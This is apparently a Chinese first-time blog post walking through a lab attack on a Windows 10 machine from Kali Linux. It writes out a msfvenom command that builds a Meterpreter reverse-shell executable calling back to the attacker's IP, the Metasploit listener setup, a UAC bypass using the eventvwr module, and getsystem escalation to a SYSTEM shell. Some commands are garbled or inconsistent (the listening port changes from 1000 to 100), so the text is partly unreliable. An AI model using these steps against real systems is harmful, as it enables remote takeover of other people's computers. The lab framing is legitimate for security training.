kali对win10入侵测试
kali 对win10入侵及提权测试在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。一、对windows 10入侵测试环境攻击机:Kali Linux 2019ip:192.168.245.143目标主机:Windows 10ip:192.168.245.1
kali 对win10入侵及提权测试
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。
一、对windows 10入侵测试
环境
攻击机:Kali Linux 2019 ip:192.168.245.143
目标主机:Windows 10 ip:192.168.245.133
1.生成exe文件,在目标主机打开
————————————————
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.245.143 LPORT=1000 -f exe -o met.exe
2.设置payload,设置本地IP和监听端口
————————————————
msf5 >use exploit/multi/handler
msf5 exploit (multi/handler) > set payload windows/meterpreter/reverse tcppayload => windows meterpreter/reverse_ tcp
msf5 exploit (multi/handler) » set l
set lhost
set loglevel
set lport
msf5 exploit (multi/handler) > set lhost 192. 168.245.143
msf5 exploit (multi/handler) » set lport 100
msf5 exploit ( multi/handler) > show opt ions
3.运行入侵测试,并获得基础的shell
msf5 exploit (multi/handler) > run
meterpreter > getsystem
meterpreter > getuid
二、输入background隐藏此界面,然后进一步提权
msf5> use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(bypassuac) > set session 3
msf5 exploit(bypassuac) > exploit
然会生成另一个session,可以进行提权操作了,提权过程中并不需要设置端口号了,默认4444即可
msf5 exploit (windows / local/bypassuac_ eventvwr) > run
2.输入命令gesystem提权,第一次getuid,显示普通用户权限,第二次是系统权限
meterpreter > Inter rupt:use the ’ exit’ c ommand to quit
meterpreter > getuid
meterpreter > getsystem
meterpreter > getuid
meterpreter > shell
WINDOWS system32>
3.获得shell之后,敲入dir命令乱码显示,只要输入chcp 65001,即可解决
C: WINDOWS system32>chcp 65001chcp 65001
Active code page: 65001
希望大佬们可以多多指点,第一次写博客!
更多推荐
所有评论(0)